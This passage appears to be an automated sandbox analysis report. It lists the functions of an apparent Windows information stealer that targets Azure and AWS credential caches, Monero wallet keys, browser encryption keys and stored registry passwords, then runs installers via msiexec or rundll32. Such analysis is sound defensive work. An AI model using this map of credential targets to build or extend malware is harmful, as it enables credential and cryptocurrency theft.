                    • Part of subcall function 00144910: DeleteFileA.KERNEL32(?), ref: 00144B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: f2294bdd8d8ef634dc5507cd4cffb43e1cd9f250918f34fcec97159fec05d339
                  • Instruction ID: 6535a3fa101f52b4461c5d2bf889481c207145e89f1ef434a9ed789cda42ebba
                  • Opcode Fuzzy Hash: f2294bdd8d8ef634dc5507cd4cffb43e1cd9f250918f34fcec97159fec05d339
                  • Instruction Fuzzy Hash: C24183BA940214B7D760F7B0EC47FED3638AB64701F404458B659660C1EFB45BCD8B92
                  Function 00149010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0014906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 38ec6cb678058ea299694c008ddcda0b50fbc4e7fbf5c8680dd9fce1f5b0653e
                  • Instruction ID: c326b929c4536ecf254631d36ffca346321c425d09e6198f1bbc7f7c0d19a6a4
                  • Opcode Fuzzy Hash: 38ec6cb678058ea299694c008ddcda0b50fbc4e7fbf5c8680dd9fce1f5b0653e
                  • Instruction Fuzzy Hash: F771DB71910608EBDB14EBE4DC89FEEB7BDAB88701F108508F51AA7290DB74A945CB61
                  Function 00142E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 001431C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0014335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 001434EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 5b878fbbe4d0c6eb1600c2574b26ec533e66ce78d2a8d3c8085ef3cd312c656d
                  • Instruction ID: 6c243f2e80322c3237a2f9fdbd5aed1667856a8861ae1b6a3382f5256eb7577b
                  • Opcode Fuzzy Hash: 5b878fbbe4d0c6eb1600c2574b26ec533e66ce78d2a8d3c8085ef3cd312c656d
                  • Instruction Fuzzy Hash: 0B123371880109AAEB19FBA0DC92FEDB778EF24305F914159F506761A1EF302B4ACF52
                  Function 001452C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 00136280: InternetOpenA.WININET(00150DFE,00000001,00000000,00000000,00000000), ref: 001362E1
                    • Part of subcall function 00136280: StrCmpCA.SHLWAPI(?,0102E470), ref: 00136303
                    • Part of subcall function 00136280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00136335
                    • Part of subcall function 00136280: HttpOpenRequestA.WININET(00000000,GET,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00136385
                    • Part of subcall function 00136280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001363BF
                    • Part of subcall function 00136280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001363D1
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145318
                  • lstrlen.KERNEL32(00000000), ref: 0014532F
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00145364
                  • lstrlen.KERNEL32(00000000), ref: 00145383
                  • lstrlen.KERNEL32(00000000), ref: 001453AE
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 8393c2d895c0e99551b6e1f7fcac02f253d554ad5aad35ed94a3eccfe525e9be
                  • Instruction ID: 53729c6094a3f5f17a93d30532a3bcf99e9f5e1b2b8dff15b3a8cba6d22f787e
                  • Opcode Fuzzy Hash: 8393c2d895c0e99551b6e1f7fcac02f253d554ad5aad35ed94a3eccfe525e9be
                  • Instruction Fuzzy Hash: 38513170950149EBDB18FF60CD92AED7779EF60305F914018F80A5B5A2EF346B46CBA2
                  Function 001412D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 8bc0e9e0680f8dcff002290b95d739dec837428138d2678031f3479859bd6bd7
                  • Instruction ID: 0a1881e1e4c0ce79a018cd5bb1cdd6200ef93e878b3e04a28637ab99aaa063b8
                  • Opcode Fuzzy Hash: 8bc0e9e0680f8dcff002290b95d739dec837428138d2678031f3479859bd6bd7
                  • Instruction Fuzzy Hash: 1DC175B594011DABCB14EF60DC89FEE7379BFA4304F104598F50AA7251DB70AA85CF91
                  Function 00144280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 001442EC
                  • lstrcat.KERNEL32(?,0102DF80), ref: 0014430B
                  • lstrcat.KERNEL32(?,?), ref: 0014431F
                  • lstrcat.KERNEL32(?,0102CF28), ref: 00144333
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 00148D90: GetFileAttributesA.KERNEL32(00000000,?,00131B54,?,?,0015564C,?,?,00150E1F), ref: 00148D9F
                    • Part of subcall function 00139CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00139D39
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                    • Part of subcall function 001493C0: GlobalAlloc.KERNEL32(00000000,001443DD,001443DD), ref: 001493D3
                  • StrStrA.SHLWAPI(?,0102DF20), ref: 001443F3
                  • GlobalFree.KERNEL32(?), ref: 00144512
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139AEF
                    • Part of subcall function 00139AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00134EEE,00000000,?), ref: 00139B01
                    • Part of subcall function 00139AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00134EEE,00000000,00000000), ref: 00139B2A
                    • Part of subcall function 00139AC0: LocalFree.KERNEL32(?,?,?,?,00134EEE,00000000,?), ref: 00139B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 001444A3
                  • StrCmpCA.SHLWAPI(?,001508D1), ref: 001444C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 001444D2
                  • lstrcat.KERNEL32(00000000,?), ref: 001444E5
                  • lstrcat.KERNEL32(00000000,00150FB8), ref: 001444F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 0aec86e0198da73ac8a947522025f3145f89156edd1511948ec17f73a3e7b743
                  • Instruction ID: 360bed47d88284c50d62f6d70ccbbcebce0fdcb2053b7490a374f46191eff487
                  • Opcode Fuzzy Hash: 0aec86e0198da73ac8a947522025f3145f89156edd1511948ec17f73a3e7b743
                  • Instruction Fuzzy Hash: 0C7174B6900608BBDB14EBE0DC85FEE777DAB98301F004598F61997191EB34DB49CB92
                  Function 00131310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 001312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001312B4
                    • Part of subcall function 001312A0: RtlAllocateHeap.NTDLL(00000000), ref: 001312BB
                    • Part of subcall function 001312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001312D7
                    • Part of subcall function 001312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001312F5
                    • Part of subcall function 001312A0: RegCloseKey.ADVAPI32(?), ref: 001312FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0013134F
                  • lstrlen.KERNEL32(?), ref: 0013135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00131377
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 00148B60: GetSystemTime.KERNEL32(00150E1A,01029918,001505AE,?,?,001313F9,?,0000001A,00150E1A,00000000,?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 00148B86
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00131465
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                    • Part of subcall function 001399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                    • Part of subcall function 001399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                    • Part of subcall function 001399C0: ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                    • Part of subcall function 001399C0: LocalFree.KERNEL32(0013148F), ref: 00139A90
                    • Part of subcall function 001399C0: CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 001314EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: b3b11a0b5b041cb0a1e642b4f12dd3d2330aad6a986c5a5d6b34824266675d77
                  • Instruction ID: 1fa33b9136c0abdf12eee73a7ae4e81db3281336fa751c6cf5c7f047dc35aa8c
                  • Opcode Fuzzy Hash: b3b11a0b5b041cb0a1e642b4f12dd3d2330aad6a986c5a5d6b34824266675d77
                  • Instruction Fuzzy Hash: 1F5146B1D9011997DB15FB60DD92BED733CEF64305F814198B60A62092EF305B89CBA6
                  Function 001375D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 001372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0013733A
                    • Part of subcall function 001372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001373B1
                    • Part of subcall function 001372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0013740D
                    • Part of subcall function 001372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00137452
                    • Part of subcall function 001372D0: HeapFree.KERNEL32(00000000), ref: 00137459
                  • lstrcat.KERNEL32(00000000,001517FC), ref: 00137606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00137648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0013765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0013768F
                  • lstrcat.KERNEL32(00000000,00151804), ref: 001376A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 001376D3
                  • lstrcat.KERNEL32(00000000,00151808), ref: 001376ED
                  • task.LIBCPMTD ref: 001376FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: 0eb1667a05e43f717311bb27b40eb5b598e0f02a04747e763e215f809cfdf3b4
                  • Instruction ID: dd5e615c753874be8384886eb0fe1dc7fc66eca9afc0f181ea93f50d1e8d724a
                  • Opcode Fuzzy Hash: 0eb1667a05e43f717311bb27b40eb5b598e0f02a04747e763e215f809cfdf3b4
                  • Instruction Fuzzy Hash: 1E3150B1900509EFCB29EBE4DC56EFF7778BB94302F104118F116A7290DB34A986CB52
                  Function 00148100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0102DD70,00000000,?,00150E2C,00000000,?,00000000), ref: 00148130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00148137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00148158
                  • __aulldiv.LIBCMT ref: 00148172
                  • __aulldiv.LIBCMT ref: 00148180
                  • wsprintfA.USER32 ref: 001481AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
